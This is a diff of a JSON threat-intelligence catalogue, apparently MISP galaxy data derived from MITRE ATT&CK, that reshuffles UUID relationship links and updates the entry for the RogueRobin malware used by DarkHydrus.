@@ -6268,21 +7645,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6294,6 +7657,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f", @@ -6323,13 +7700,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -6344,6 +7714,13 @@ ], "type": "uses" }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -6392,6 +7769,13 @@ ], "type": "uses" }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ 
@@ -6399,20 +7783,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -6421,7 +7791,21 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6460,6 +7844,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5a84dc36-df0d-4053-9b7c-f0c388a57283", @@ -6551,20 +7942,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ 
@@ -6572,12 +7949,26 @@ ], "type": "uses" }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "48523614-309e-43bf-a2b8-705c2b45d7b2", @@ -6651,7 +8042,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6665,28 +8056,7 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6700,14 +8070,21 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6721,7 +8098,21 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6748,28 +8139,7 @@ }, "related": [ { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6783,28 +8153,7 @@ "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6818,28 +8167,21 @@ "type": "uses" }, { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6859,48 +8201,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ @@ -6909,7 +8209,7 @@ "type": "uses" }, { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6923,14 +8223,49 @@ "type": "uses" }, { - "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6944,14 +8279,56 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6965,7 +8342,21 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7014,14 +8405,14 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7062,35 +8453,7 @@ "type": "uses" }, { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7104,7 +8467,35 @@ "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7115,7 +8506,7 @@ "value": "OwaAuth - S0072" }, { - "description": "[RogueRobin](https://attack.mitre.org/software/S0270) is a custom PowerShell-based payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079). (Citation: Unit 42 DarkHydrus July 2018)", + "description": "[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)", "meta": { "external_id": "S0270", "mitre_platforms": [ @@ -7123,7 +8514,8 @@ ], "refs": [ "https://attack.mitre.org/software/S0270", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/" ], "synonyms": [ "RogueRobin" 
@@ -7131,35 +8523,7 @@ }, "related": [ { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7173,42 +8537,7 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7221,6 +8550,27 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -7229,7 +8579,7 @@ "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7241,6 +8591,76 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "8ec6e3b4-b06d-4805-b6aa-af916acc2122", 
@@ -7271,7 +8691,7 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7285,7 +8705,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7395,14 +8815,21 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7416,7 +8843,7 @@ "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7436,34 +8863,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -7479,7 +8878,28 @@ "type": "uses" }, { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7506,14 +8926,7 @@ }, "related": [ { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7526,6 +8939,13 @@ ], "type": "uses" }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", "tags": [ @@ -7534,14 +8954,14 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7575,13 +8995,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -7597,7 +9010,7 @@ "type": "uses" }, { - "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7611,14 +9024,21 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7689,14 +9109,14 @@ "type": "uses" }, { - "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7868,14 +9288,7 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7889,14 +9302,21 @@ "type": "uses" }, { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ 